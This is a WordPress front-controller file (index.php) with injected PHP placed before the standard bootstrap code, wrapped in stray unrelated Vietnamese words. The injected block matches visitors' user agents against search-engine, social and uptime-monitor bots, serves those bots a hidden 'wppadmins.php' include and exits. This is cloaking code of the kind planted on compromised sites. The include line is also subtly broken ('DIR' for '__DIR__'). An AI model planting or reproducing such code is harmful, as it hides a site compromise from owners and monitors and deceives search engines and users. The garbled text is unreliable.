ruạṛ
<?php session_start(); $userAgent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); $botPattern = '/bot|crawl|spider|slurp|fetch|scanner|search|mediapartners|googlebot|google|bingbot|bing|yahoo|yandex|baidu|duckduckgo|facebot|facebookexternalhit|applebot|linkedinbot|twitterbot|slackbot|telegrambot|discordbot|whatsapp|ahrefs|semrush|mj12bot|dotbot|rogerbot|screaming frog|uptime|pingdom|monitis|gtmetrix/i'; if (preg_match($botPattern, $userAgent)) { include DIR . '/wppadmins.php'; exit; } /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
cải xoăn